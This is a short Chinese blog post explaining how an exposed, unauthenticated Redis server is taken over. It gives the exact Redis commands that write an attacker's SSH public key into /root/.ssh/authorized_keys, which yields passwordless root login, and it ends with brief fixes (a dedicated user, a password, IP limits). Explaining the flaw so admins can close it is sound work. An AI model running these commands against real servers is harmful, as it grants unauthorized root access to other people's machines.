天问

Redis漏洞而获得服务器权限

黑客可以全网扫描redis漏洞,批量尝试性登录。一旦登录某台机主机。

使用如下命令即可向/root/.ssh文件夹下写公钥。

config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "\n\n\nssh-rsa key_pub\n\n\n"      #其中key_pub为上图生成的公钥
save

即可将公钥保存在远端服务器,使得登录时不需要输入账号与密码。


修复的方法非常简单:
(1)新建redis用户启动redis
(2)设置密码
(3)限制本地登录,或者添加ip访问限制。
博客地址:http://blog.yoqi.me/?p=2291
扫我捐助哦
喜欢 0

这篇文章还没有评论

发表评论